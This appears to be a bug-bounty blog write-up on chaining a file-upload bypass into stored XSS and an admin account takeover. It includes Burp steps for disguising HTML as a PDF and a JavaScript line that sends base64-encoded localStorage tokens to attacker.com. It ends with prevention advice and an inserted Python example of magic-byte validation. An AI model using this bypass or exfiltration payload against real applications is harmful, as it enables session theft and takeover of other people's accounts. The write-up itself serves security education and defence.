From Uploading a "PDF" To Owning The Admin Account💀
How a Tiny Upload Bug Turned into a Full-Admin Account Takeover
Rehan Ansari
April 5, 2026 (Updated: April 5, 2026)
🎬 The Story Begins…
Imagine this 👇
You're testing an application. Everything looks normal.
Upload feature?
File restrictions?
Admin review workflow?
Nothing screams critical vulnerability.
But deep inside this "normal" feature… a silent attack chain is waiting to happen.
And all it takes… is one file upload.
Attack Summary:
File Upload → HTML Injection → Token Theft → Admin Account Takeover👑
Phase 1: The "Secure" Upload Feature
The application only allowed these file types:
JPG
PNG
PDF
Anything else?
❌ Rejected instantly
At this point, most people move on.
But here's the mindset shift 👇
"What if I don't break the rules… but bend them?"
Phase 2: Bypassing File Upload Validation
Using Burp Suite, I intercepted the upload request.
Instead of fighting validation… we manipulate it.
1. Upload a legitimate PDF file
2. Intercept the request in Burp
3. Modify the filename: file.pdf → file.html
4. Modify the Content-Type: application/pdf → text/html
5. Delete the PDF content
6. Inject malicious HTML
7. Forward the request
Result?
The server happily accepts our "file" as HTML!
No alarms. No errors. No validation.
Why This Was Possible:
Because the backend trusted:
The file extension
The Content-Type header
Instead of:
The actual file content
Magic-byte validation
Phase 3: Finding the Real Gold
Now comes the real question:
"What can we steal?"
The application uses:
🔐 Bearer Token Authentication
Stored in: localStorage
Key name: userTokenDetail
This is a jackpot because anything in localStorage can be accessed via JavaScript, and that's where things get interesting… 👀
Phase 4: Weaponizing the Upload
We upload this malicious HTML file:
What This Payload Actually Does:
Let's decode what's happening here 👇
🔹 Self-Executing Function: (function() { ... })();
Runs automatically when the file is opened
No user interaction required
🔹 Extracting Local Storage: JSON.stringify(localStorage)
Converts all stored data into string format
🔹 Encoding Data: btoa(...)
Encodes the data in Base64
Makes it safe to send via URL
🔹 Data Exfiltration Trick: new Image().src = "https://attacker.com/?data=" + data;
Creates an invisible image request
Sends the stolen data to the attacker's server
No CORS issues, no alerts
Phase 5: The Real Attack Flow
Now comes the interesting part: how we reached admin takeover.
Step A: Attacker Uploads Malicious File
Uploads HTML disguised as PDF
File gets stored successfully
Step B: Application Workflow
The app has a feature:
Uploaded documents go to Admin for validation
Step C: Admin Reviews the File
Admin logs in
Opens uploaded file
Browser executes malicious JavaScript
Step D: Token Theft
Script extracts:
userTokenDetail
Sends it to attacker server
Step E: Account Takeover
Attacker now:
Opens browser
Inserts stolen token into localStorage
Accesses application
Admin account successfully hijacked
How to Prevent This:
1. Strong File Validation
Validate the file type using magic bytes
Do not trust extensions or headers
2. Store Files Securely
Serve files as a download:
Content-Disposition: attachment
Never render user-uploaded HTML
3. Implement CSP
Content-Security-Policy: default-src 'self';
Blocks data exfiltration attempts
4. Sanitize Uploads
Block .html, .js and .svg
Scan uploaded content
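As an added example that is not code from the post: the kind of check Phase 2 got past (trusting only the declared filename and Content-Type) beside a magic-byte check, plus the response headers the prevention section asks for when serving a stored upload. The function names, the MAGIC table and the sample bodies are my own constructions.

```python
# Added example, not code from the post. Names and sample bodies are constructed.
import re

# Leading bytes of the three types the application allows (JPG, PNG, PDF).
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "pdf": b"%PDF-",
}
# Declared Content-Type -> canonical extension.
ALLOWED_TYPES = {"image/jpeg": "jpg", "image/png": "png", "application/pdf": "pdf"}


def _ext(filename: str) -> str:
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return "jpg" if ext == "jpeg" else ext


def weak_validate(filename: str, content_type: str, data: bytes) -> bool:
    """The pattern the post describes: only the extension and the Content-Type
    header are consulted; `data` is never inspected."""
    return _ext(filename) in MAGIC and content_type in ALLOWED_TYPES


def strong_validate(filename: str, content_type: str, data: bytes) -> bool:
    """Hardened: extension, declared type and magic bytes must all agree."""
    ext = _ext(filename)
    if ext not in MAGIC or ALLOWED_TYPES.get(content_type) != ext:
        return False
    return data.startswith(MAGIC[ext])


def download_headers(stored_name: str) -> dict:
    """Headers for serving a stored upload so the browser downloads it instead of
    rendering it; stored_name is sanitised so it cannot break the header."""
    safe = re.sub(r"[^A-Za-z0-9._-]", "_", stored_name)
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


if __name__ == "__main__":
    # Constructed body: HTML disguised with a PDF name and Content-Type.
    disguised = b"<html><script>/* exfil */</script></html>"
    print(weak_validate("file.pdf", "application/pdf", disguised))        # True
    print(strong_validate("file.pdf", "application/pdf", disguised))      # False
    print(strong_validate("report.pdf", "application/pdf", b"%PDF-1.7\n"))  # True
```

The post's CSP of default-src 'self' only helps if it is sent with the response that actually renders the upload; serving the file as an attachment with nosniff, as above, removes the rendering step altogether.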
Key Takeaways:
Never trust file uploads
Never store sensitive data in localStorage
Always think in attack chains, not single bugs
Final Thoughts:
This attack is a classic example of:
From just uploading a file → To executing JavaScript → To stealing tokens → To owning the admin
If you're a Pentester:
Always test file uploads beyond extensions
If you're a developer:
Your upload feature might be your biggest risk
If you found this blog interesting, it is because it shows how dangerous "small" bugs can become when chained together.
What started as a simple file upload turned into a full admin account takeover, and that's exactly how real-world attacks happen.
If you're into web security, pentesting or bug bounty hunting, always go beyond the obvious and think like an attacker, because the real impact lies in connecting the dots.
If you enjoyed this write-up, feel free to share it with your network and follow for more real-world vulnerability breakdowns 🔥
#CyberSecurity #WebSecurity #Pentesting #BugBounty #InfoSec #EthicalHacking #XSS #AccountTakeover #ApplicationSecurity #RedTeam #BlueTeam #BugBountyHunter #SecurityResearch #OWASP #InfosecCommunity
#account-takeover #stored-xss #file-upload-vulnerability #owasp #bug-bounty